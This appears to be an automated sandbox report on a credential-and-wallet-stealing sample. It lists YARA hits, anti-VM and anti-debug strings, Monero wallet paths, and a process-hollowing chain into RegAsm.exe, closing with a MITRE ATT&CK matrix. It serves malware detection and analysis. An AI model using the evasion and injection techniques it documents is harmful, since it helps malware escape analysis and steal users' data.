                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: 0.2.file.exe.33d5570.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.33d5570.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1775378329.00000000033D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 928, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5676, type: MEMORYSTR
                      Source: RegAsm.exeBinary or memory string: DIR_WATCH.DLL
                      Source: RegAsm.exe, 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
                      Source: RegAsm.exeBinary or memory string: SBIEDLL.DLL
                      Source: RegAsm.exeBinary or memory string: API_LOG.DLL
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 2330000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 23D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 43D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,3_2_0040180D
                      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\file.exe TID: 5020Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,3_2_00415142
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00410FBA GetSystemInfo,3_2_00410FBA
                      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: Amcache.hve.9.drBinary or memory string: VMware
                      Source: Amcache.hve.9.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin
                      Source: Amcache.hve.9.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.9.drBinary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.9.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.9.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.9.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.9.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.9.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: Amcache.hve.9.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.9.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW A
                      Source: Amcache.hve.9.drBinary or memory string: vmci.sys
                      Source: Amcache.hve.9.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                      Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin`
                      Source: Amcache.hve.9.drBinary or memory string: \driver\vmci,\driver\pci
                      Source: Amcache.hve.9.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.9.drBinary or memory string: VMware20,1
                      Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.9.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.9.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000D8A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                      Source: Amcache.hve.9.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.9.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.9.drBinary or memory string: VMware PCI VMCI Bus Device
                      Source: Amcache.hve.9.drBinary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.9.drBinary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.9.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000D8A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx{
                      Source: Amcache.hve.9.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_3-21714
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_3-21699
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041BC21 malloc,SetFilePointer,LdrInitializeThunk,CreateFileA,CreateFileMappingA,MapViewOfFile,CloseHandle,3_2_0041BC21
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0041D016
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042582E LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_0042582E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004014AD mov eax, dword ptr fs:[00000030h]3_2_004014AD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040148A mov eax, dword ptr fs:[00000030h]3_2_0040148A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004014A2 mov eax, dword ptr fs:[00000030h]3_2_004014A2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041859A mov eax, dword ptr fs:[00000030h]3_2_0041859A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00410C53 GetProcessHeap,HeapAlloc,GetUserNameA,3_2_00410C53
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0041D016
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041D98C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0041D98C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042762E SetUnhandledExceptionFilter,3_2_0042762E
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 928, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5676, type: MEMORYSTR
                      Source: file.exe, Program.csReference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
                      Source: file.exe, Program.csReference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
                      Source: file.exe, Program.csReference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_023D212D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_023D212D
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 931008Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040111D cpuid 3_2_0040111D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: LdrInitializeThunk,GetLocaleInfoA,3_2_00410DDB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: LdrInitializeThunk,GetLocaleInfoW,LdrInitializeThunk,GetLocaleInfoW,GetACP,3_2_0042B0CC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,3_2_0042B1C1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,3_2_00429A50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: LdrInitializeThunk,GetLocaleInfoW,_GetPrimaryLen,_strlen,3_2_0042B268
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,3_2_0042B2C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ___getlocaleinfo,__malloc_crt,LdrInitializeThunk,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,3_2_0042AB40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,LdrInitializeThunk,__calloc_crt,GetLocaleInfoW,_free,LdrInitializeThunk,GetLocaleInfoW,3_2_004253E3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,3_2_0042B494
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,3_2_0042749C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesA,3_2_0042B556
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,3_2_00429D6E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,3_2_0042E56F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_00427576
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,3_2_00428DC4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _strlen,LdrInitializeThunk,_GetPrimaryLen,EnumSystemLocalesA,3_2_0042B5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _strlen,_strlen,LdrInitializeThunk,_GetPrimaryLen,EnumSystemLocalesA,3_2_0042B580
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,3_2_0042B623
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,3_2_0042E6A4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041C0E9 lstrcpyA,GetLocalTime,SystemTimeToFileTime,3_2_0041C0E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00410C53 GetProcessHeap,HeapAlloc,GetUserNameA,3_2_00410C53
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00410D2E GetTimeZoneInformation,3_2_00410D2E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: Amcache.hve.9.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.9.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.9.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E5F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2185117153.0000000000D8A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: Amcache.hve.9.drBinary or memory string: MsMpEng.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 0.2.file.exe.33d5570.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.33d5570.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1775378329.00000000033D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 928, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5676, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5676, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 0.2.file.exe.33d5570.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.33d5570.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1775378329.00000000033D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 928, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5676, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      411
                      Process Injection
                      1
                      Masquerading
                      OS Credential Dumping2
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      11
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts11
                      Native API
                      Boot or Logon Initialization Scripts1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      LSASS Memory161
                      Security Software Discovery
                      Remote Desktop ProtocolData from Removable Media2
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)41
                      Virtualization/Sandbox Evasion
                      Security Account Manager41
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared Drive3
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook411
                      Process Injection
                      NTDS2
                      Process Discovery
                      Distributed Component Object ModelInput Capture114
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information
                      LSA Secrets1
                      Application Window Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                      Obfuscated Files or Information
                      Cached Domain Credentials1
                      Account Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                      Software Packing
                      DCSync1
                      System Owner/User Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
